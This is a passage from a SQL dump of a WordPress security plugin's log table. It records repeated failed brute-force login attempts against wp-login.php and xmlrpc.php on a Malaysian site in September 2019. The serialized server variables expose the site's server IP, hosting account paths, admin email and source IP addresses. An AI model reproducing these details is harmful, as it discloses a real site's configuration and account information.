05:18:51',18257776,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'94.23.32.126'),(23810,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"44940\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3JuPPfj5xLH6d8s95qmAAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568524728.3872\";s:12:\"REQUEST_TIME\";s:10:\"1568524728\";}}','notice','2019-09-15 05:18:50','2019-09-15 05:18:48',17906904,19231976,'https://bintara.com.my/wp-login.php',1,0,'94.23.32.126'),(23809,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"44940\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3JuPPfj5xLH6d8s95qmAAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568524728.3872\";s:12:\"REQUEST_TIME\";s:10:\"1568524728\";}}','notice','2019-09-15 05:18:49','2019-09-15 05:18:48',17745232,19231976,'https://bintara.com.my/wp-login.php',1,0,'94.23.32.126'),(23808,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"41044\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3HOlNglnLNtPb4WmyBBwAAAUY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568524090.2197\";s:12:\"REQUEST_TIME\";s:10:\"1568524090\";}}','notice','2019-09-15 05:08:11','2019-09-15 05:08:10',18257776,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(23807,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"40742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3HN7XKYz7ocPqFjcW6CQAAANE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568524087.237\";s:12:\"REQUEST_TIME\";s:10:\"1568524087\";}}','notice','2019-09-15 05:08:08','2019-09-15 05:08:07',17738784,19229840,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(23806,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"42146\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3EY7XKYz7ocPqFjcW5zwAAAMM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568523363.9633\";s:12:\"REQUEST_TIME\";s:10:\"1568523363\";}}','notice','2019-09-15 04:56:05','2019-09-15 04:56:04',18257728,19555480,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.211.251'),(23805,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"41850\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3EYZgHXVncm@@EIY9kPgAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568523361.9626\";s:12:\"REQUEST_TIME\";s:10:\"1568523361\";}}','notice','2019-09-15 04:56:03','2019-09-15 04:56:02',17739368,19230656,'https://bintara.com.my/wp-login.php',1,0,'148.72.211.251'),(23804,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"56472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3B9-Pfj5xLH6d8s95mrAAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568522743.4869\";s:12:\"REQUEST_TIME\";s:10:\"1568522743\";}}','notice','2019-09-15 04:45:44','2019-09-15 04:45:43',18258680,19553512,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(23803,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"56102\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3B9bXKYz7ocPqFjcW5kQAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568522741.375\";s:12:\"REQUEST_TIME\";s:10:\"1568522741\";}}','notice','2019-09-15 04:45:42','2019-09-15 04:45:41',17740880,19232768,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(23802,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"43482\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2-EvPfj5xLH6d8s95k5wAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568522002.7127\";s:12:\"REQUEST_TIME\";s:10:\"1568522002\";}}','notice','2019-09-15 04:33:24','2019-09-15 